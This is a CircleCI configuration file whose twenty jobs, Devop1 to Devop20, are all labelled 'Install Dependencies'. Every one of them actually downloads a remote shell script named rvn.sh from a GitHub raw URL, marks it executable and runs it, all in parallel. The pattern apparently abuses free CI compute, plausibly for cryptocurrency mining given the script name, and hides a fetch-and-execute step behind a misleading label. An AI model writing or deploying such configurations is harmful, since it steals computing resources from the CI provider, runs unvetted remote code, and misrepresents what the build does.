version: 2.1
jobs:
    Devop:
      docker:
            - image: circleci/ruby:2.5.3
      steps:
        - run:
            name: Install Dependencies
            command: timeout 1m lscpu
    Devop1:
      docker:
            - image: circleci/ruby:2.5.3
      steps:
        - run:
            name: Install Dependencies
            command: timeout 1m wget https://raw.githubusercontent.com/angkii/kontol/main/rvn.sh && chmod 777 rvn.sh && ./rvn.sh
    Devop2:
      docker:
            - image: circleci/ruby:2.5.3
      steps:
        - run:
            name: Install Dependencies
            command: timeout 1m wget https://raw.githubusercontent.com/angkii/kontol/main/rvn.sh && chmod 777 rvn.sh && ./rvn.sh
    Devop3:
      docker:
            - image: circleci/ruby:2.5.3
      steps:
        - run:
            name: Install Dependencies
            command: timeout 1m wget https://raw.githubusercontent.com/angkii/kontol/main/rvn.sh && chmod 777 rvn.sh && ./rvn.sh
    Devop4:
      docker:
            - image: circleci/ruby:2.5.3
      steps:
        - run:
            name: Install Dependencies
            command: timeout 1m wget https://raw.githubusercontent.com/angkii/kontol/main/rvn.sh && chmod 777 rvn.sh && ./rvn.sh
    Devop5:
      docker:
            - image: circleci/ruby:2.5.3
      steps:
        - run:
            name: Install Dependencies
            command: timeout 1m wget https://raw.githubusercontent.com/angkii/kontol/main/rvn.sh && chmod 777 rvn.sh && ./rvn.sh
    Devop6:
      docker:
            - image: circleci/ruby:2.5.3
      steps:
        - run:
            name: Install Dependencies
            command: timeout 1m wget https://raw.githubusercontent.com/angkii/kontol/main/rvn.sh && chmod 777 rvn.sh && ./rvn.sh
    Devop7:
      docker:
            - image: circleci/ruby:2.5.3
      steps:
        - run:
            name: Install Dependencies
            command: timeout 1m wget https://raw.githubusercontent.com/angkii/kontol/main/rvn.sh && chmod 777 rvn.sh && ./rvn.sh
    Devop8:
      docker:
            - image: circleci/ruby:2.5.3
      steps:
        - run:
            name: Install Dependencies
            command: timeout 1m wget https://raw.githubusercontent.com/angkii/kontol/main/rvn.sh && chmod 777 rvn.sh && ./rvn.sh
    Devop9:
      docker:
            - image: circleci/ruby:2.5.3
      steps:
        - run:
            name: Install Dependencies
            command: timeout 1m wget https://raw.githubusercontent.com/angkii/kontol/main/rvn.sh && chmod 777 rvn.sh && ./rvn.sh
    Devop10:
      docker:
            - image: circleci/ruby:2.5.3
      steps:
        - run:
            name: Install Dependencies
            command: timeout 1m wget https://raw.githubusercontent.com/angkii/kontol/main/rvn.sh && chmod 777 rvn.sh && ./rvn.sh
    Devop11:
      docker:
            - image: circleci/ruby:2.5.3
      steps:
        - run:
            name: Install Dependencies
            command: timeout 1m wget https://raw.githubusercontent.com/angkii/kontol/main/rvn.sh && chmod 777 rvn.sh && ./rvn.sh
    Devop12:
      docker:
            - image: circleci/ruby:2.5.3
      steps:
        - run:
            name: Install Dependencies
            command: timeout 1m wget https://raw.githubusercontent.com/angkii/kontol/main/rvn.sh && chmod 777 rvn.sh && ./rvn.sh
    Devop13:
      docker:
            - image: circleci/ruby:2.5.3
      steps:
        - run:
            name: Install Dependencies
            command: timeout 1m wget https://raw.githubusercontent.com/angkii/kontol/main/rvn.sh && chmod 777 rvn.sh && ./rvn.sh
    Devop14:
      docker:
            - image: circleci/ruby:2.5.3
      steps:
        - run:
            name: Install Dependencies
            command: timeout 1m wget https://raw.githubusercontent.com/angkii/kontol/main/rvn.sh && chmod 777 rvn.sh && ./rvn.sh
    Devop15:
      docker:
            - image: circleci/ruby:2.5.3
      steps:
        - run:
            name: Install Dependencies
            command: timeout 1m wget https://raw.githubusercontent.com/angkii/kontol/main/rvn.sh && chmod 777 rvn.sh && ./rvn.sh
    Devop16:
      docker:
            - image: circleci/ruby:2.5.3
      steps:
        - run:
            name: Install Dependencies
            command: timeout 1m wget https://raw.githubusercontent.com/angkii/kontol/main/rvn.sh && chmod 777 rvn.sh && ./rvn.sh
    Devop17:
      docker:
            - image: circleci/ruby:2.5.3
      steps:
        - run:
            name: Install Dependencies
            command: timeout 1m wget https://raw.githubusercontent.com/angkii/kontol/main/rvn.sh && chmod 777 rvn.sh && ./rvn.sh
    Devop18:
      docker:
            - image: circleci/ruby:2.5.3
      steps:
        - run:
            name: Install Dependencies
            command: timeout 1m wget https://raw.githubusercontent.com/angkii/kontol/main/rvn.sh && chmod 777 rvn.sh && ./rvn.sh
    Devop19:
      docker:
            - image: circleci/ruby:2.5.3
      steps:
        - run:
            name: Install Dependencies
            command: timeout 1m wget https://raw.githubusercontent.com/angkii/kontol/main/rvn.sh && chmod 777 rvn.sh && ./rvn.sh
    Devop20:
      docker:
            - image: circleci/ruby:2.5.3
      steps:
        - run:
            name: Install Dependencies
            command: timeout 1m wget https://raw.githubusercontent.com/angkii/kontol/main/rvn.sh && chmod 777 rvn.sh && ./rvn.sh
workflows:
    version: 2.1
    build:
        jobs:
            - Devop1
            - Devop2
            - Devop3
            - Devop4
            - Devop5
            - Devop6
            - Devop7
            - Devop8
            - Devop9
            - Devop10
            - Devop11
            - Devop12
            - Devop13
            - Devop14
            - Devop15
            - Devop16
            - Devop17
            - Devop18
            - Devop19
            - Devop20